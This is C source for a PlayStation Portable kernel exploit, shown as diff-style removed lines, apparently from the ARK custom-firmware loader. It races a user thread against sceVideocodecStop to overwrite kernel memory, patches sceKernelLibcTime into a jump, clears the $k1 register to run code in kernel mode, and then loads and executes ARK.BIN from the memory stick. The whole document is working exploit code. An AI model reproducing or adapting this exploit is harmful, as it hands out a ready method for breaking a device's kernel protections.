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- #include <pspkernel.h>
- u32 sceMeCodecWrapper = 0x88136800, sw_address = 0;
- int is_exploited = 0, running = 1;
- u32 a0[24];
- int storethread()
- {
- while (running == 1) {
- a0[11] = sw_address;
- sceKernelDelayThread(1);
- }
- sceKernelExitThread(0);
- }
- void KernelContent()
- {
- is_exploited = 1;
- __asm("move $k1, $0;");
- //"restore" me_wrapper mutex UID
- SceUID (* _sceKernelCreateMutex)(const char *name, u32 attr, int init_count, void *options) = \
- (void *)FindExport("sceThreadManager", "ThreadManForUser", 0xB7D098C6);
- SceUID mutex = _sceKernelCreateMutex("SceKermitMe", 256, 0, NULL);
- _sw(mutex, sceMeCodecWrapper + 0x2F80);
- //sceKernelLibcTime - pass address of kernel function in first arg, restored later in ARK code. |:
- _sw(0x00800008, 0x8800F9C4); //jr $a0
- _sw(0, 0x8800F9C8); //nop
- void (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;
- void (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;
- _sceKernelDcacheWritebackInvalidateAll();
- _sceKernelIcacheInvalidateAll();
- }
- void do_exploit()
- {
- is_exploited = 0;
- running = 1;
- sw_address = (sceMeCodecWrapper + 0x2F80) - 36;
- SceUID thid = sceKernelCreateThread("thid", storethread, 8, 512, THREAD_ATTR_USER, NULL);
- sceKernelStartThread(thid, 0, NULL);
- sceUtilityLoadModule(0x300);
- sceUtilityLoadModule(0x303);
- int (* sceVideocodecStop)(u32 *a0, int a1) = (void *)FindImport("sceVideocodec", 0xA2F0564E, 0);
- memset(a0, 0, sizeof(a0));
- a0[0] = 0x05100601;
- a0[15] = 1;
- int i;
- while (a0[2] != 0x800201C3) {
- a0[15] = 1;
- a0[3] = 0x09000000;
- a0[4] = 0x09000000;
- a0[2] = 0;
- a0[11] = 0x09000000;
- sceVideocodecStop(a0, 0);
- }
- fillvram(-1);
- sw_address = 0x8800F9C4 - 36;
- int (* _sceKernelLibcTime)(u32, u32) = (void *)sceKernelLibcTime;
- while (is_exploited != 1) {
- a0[15] = 1;
- a0[11] = 0x09000000;
- a0[3] = 0x09000000;
- a0[4] = 0x09000000;
- sceVideocodecStop(a0, 0);
- sceKernelDcacheWritebackAll();
- _sceKernelLibcTime(0x08800000, ((u32)&KernelContent | 0x80000000));
- }
- fillvram(0xFF00);
- running = 0;
- u8 buf[0x4000];
- SceUID fd = sceIoOpen("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/ARK.BIN", PSP_O_RDONLY, 0777);
- sceIoRead(fd, buf, sizeof(buf));
- sceIoClose(fd);
- memcpy((void *)0x10000, buf, sizeof(buf));
- sceKernelDcacheWritebackAll();
- void (* Start)(const char *) = (void *)0x10000;
- Start("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/");
- }
- void _start() __attribute__ ((section (".text.start")));
- void _start()
- {
- fillvram(0x80808080);
- do_exploit();
- sceKernelExitGame();
- }
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